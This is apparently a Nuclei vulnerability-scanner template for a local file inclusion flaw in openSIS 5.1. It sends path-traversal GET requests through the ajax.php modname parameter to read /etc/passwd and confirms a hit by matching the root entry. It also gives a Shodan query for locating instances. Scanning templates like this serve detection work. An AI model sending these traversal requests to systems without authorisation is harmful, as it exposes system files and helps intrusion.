37 lines
1.4 KiB
YAML
37 lines
1.4 KiB
YAML
id: opensis-lfi
|
|
|
|
info:
|
|
name: openSIS 5.1 - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/38039
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
shodan-query: http.title:"openSIS"
|
|
product: opensis
|
|
vendor: os4ed
|
|
tags: opensis,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
|
|
- "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100b66bd09686c7adc68cbd0931d0806db593cb9c1317c2dace06c25d9077f47bfb022100d98962079bbbfbbca99f4bfb3ac28c9a2aff8fc01740d15aebf08e22c9062b90:922c64590222798bb761d5b6d8e72950 |